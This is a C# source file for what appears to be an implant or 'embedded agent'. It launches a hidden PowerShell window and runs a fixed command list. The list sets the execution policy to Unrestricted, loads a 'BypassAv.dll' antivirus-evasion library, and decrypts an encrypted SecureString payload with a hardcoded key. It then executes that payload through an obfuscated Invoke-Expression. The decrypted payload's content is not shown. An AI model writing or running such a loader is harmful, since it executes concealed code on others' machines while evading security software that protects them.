using System.Diagnostics;

namespace EmbeddedAgent
{
    internal class AgentProcess
    {
        public static void ExecuteCommands(List<string> commands)
        {
            ProcessStartInfo psi = new ProcessStartInfo();

            psi.CreateNoWindow = true;
            psi.FileName = "powershell.exe";
            psi.WindowStyle = ProcessWindowStyle.Hidden;

            psi.ArgumentList.Add("-Command");

            commands.ForEach(command =>
            {
                psi.ArgumentList.Add(command + ";");
            });

            psi.UseShellExecute = false;
            psi.RedirectStandardOutput = true;
            psi.CreateNoWindow = true;

            Process process = new Process();

            process.StartInfo = psi;
            process.Start();

            string output = process.StandardOutput.ReadToEnd();

            process.WaitForExit();
            Console.WriteLine(output);
        }

        public static List<string> InitCommands()
        {

            return new List<string>
            {
                "Set-ExecutionPolicy Unrestricted",
                "Add-Type -Path .\\BypassAv.dll",
                "[BypassAV.Evasion]::Evade()",
                "( nEW-OBJeCt MANagemeNt.aUTOMAtiOn.PscreDeNTIAl ' ', ('76492d1116743f0423413b16050a5345MgB8ADQAawBVAEIAVgBEAFQASQAwAGEAZQBtAGIAbwBpAHcASAA1AEcAQwBOAGcAPQA9AHwAZQA2AGMANwBkADcANgAxAGEAMQBlAGQAZAA4ADIAYwAzADQANwBiADAANAA3ADEAZgAxAGQAOQA4AGEAMwBmADEAZQA0ADAANABmADkAMAA1ADAAYwAxAGIAOAA0ADMANQA4ADIAMgA4AGMAYwA5AGIAMAAzADQAZgBiADgAOABkADAAZQBiADgAMgA2AGUAZAAxADEANQA1ADIAYQA2ADMAOAA2ADMAZABiAGUANQA4AGUANgBmADcANQA5ADIAZQBjAGQAYgBkAGIAZgBhADYAOAA2ADUAMgAxADgAMgA5AGIANgBkADIAOABhADkAMQAxADIAMQAwAGQAOQAyAGYAMQA0ADIAZQAxADUAZQBkAGMANgAxADAAOQAzAGYAMQBmAGUAMQBjAGYAZgAwAGMAOAA4ADYANgBiADQAMQBmADAAMwAyADAAOABlAGQAMgBjAGMAMQAwAGMAYwA1ADQAZQA3ADEANQBkAGQANwBmADIAYwAzADIAOQA5AGMAZQBkADQAZABjAGYAMAA1ADEAOAA2ADMAMgA3ADYANwBmAGYAZgBhADIAMAAxADIANgBmAGYAMAAwAGMANgBkAGIAYQA1AGUAYgA0AGYAZgBhAGIAMAAwADkAMwBiAGIANABiADQAMQAzADkAMABjAGYAZgA0ADAANwA1ADIAOQAxADAAMgA4AGEAZgBmADkAMABmADkANQBhAGMANQBlADIAZQA1ADAAMwA0ADQANwAxADIANQA5AGUAZQA2ADQANwA5AGUAZgA2AGUAYQA4ADMANQA0ADMAYgA5ADkAMQBmADUAMwA1ADIAOABkAGEAMwA3AGMAOAA2AGYAYwA5ADAAMwAxADAAMgA3AGYAYQBmAGQAMQBhADQAMgA2AGEAMAA1AGEAYgA4ADUAZQA2ADUANgAwADkANwBhADAANQAzAGQAYgBlAGIAMAA0ADkANgBlADYAYQA5ADIAZAA4ADQAMwA1ADEANQBkADEAMwA5ADYAMQAwADEAOABlADgAYgBjADMAZQAwAGEAYgBkADcAMwBmAGEAYQBmAGQAMQBkAGMAOQA2ADgAYQAxADAAMgAwAGEAOQA4ADkAYwAxADMAMQAxADkAMAA5ADEAMAA4ADIAZAA2AGMANwA5ADgAZgBjADEANQBhAGYAZQAzADYAYwBhADAANAAxADMANABmADMAMAA2AGMANQAwADAAZQA3ADMANQAzADQAZAAxAGMAOAAxAGYAMQBhADMAZgBiADYANQBhADQANAA3ADQAMAAxADcAMwAyADUANgBlADYANAAwADAAYgA2AGQANgA5AGYANwBhADEANgAzADAANgBkADkAOQA0ADAAOAAwADAAZABjADYANgAyADgAOAA1ADQAYQBmADUAOABiADcAZQBkADcAYgBiAGMAMwBjADAAYgA4ADgAYQBmAGQAZQAxAGYANAA2AGIAZQAzAGIANwAyAGIAYgAzAGYAYQAzADQANABiAGEAOQBlADEAZgBjAGYAMAA3AGEANgBkADkAYwAwADMAMAAxADkAMgA0ADcAMABiADkANABhADYANABkAGUANgA5AGIANwA4ADkAZgBmADUAMAAyADkAOQAzAGYANQBlADYAYgAzADQAMABiADEANQBjAGUANQA5AGIAMwBkADEAZQBmADcANwBkADgAOQA5ADEAMgA5AGYANwA5ADgAZgA0ADgAZQBiAGEAYQBlADUAZgAzAGMAYwBkADYAMABkADQAYgBjADIANAA1ADcAMAA3ADgAMQBhAGEAOABhADMAZQA5ADcAMQAyADEAMwBmAGQAMAA0AGMAMgBhAGQAMAA3AGQANAA2ADkAMQA4ADEAMwBjAGUAYgBiADAANABhADcAZgAxAGUANgA4ADcAYgA1ADkANQBiAGYANQA3ADgANgAzADQAZAA4AGUAYQBmADQANAA4AGMAYgBiADgAOQBiADQAYgBiAGYAYwBhADMAMwAyAGEAYQBjAGIAMAAxAGEAMgBjADQAYQA3ADQAOQAwADMANAA1ADEAYQA4AGYAYwBlADgAMQBiADUAOQA5AGYAZQAzADcANgBmAGUAZABmAGYAMwAwADAAYQAyADEANQA4ADIANABiAA=='| coNVERttO-secURestrinG  -KEy (10..25))).GeTnetWORkCRedEnTIal().pasSWOrd| &((GeT-VARiAbLE '*MdR*').NAme[3,11,2]-JOiN'')"

            }; ;
        }

    }
}
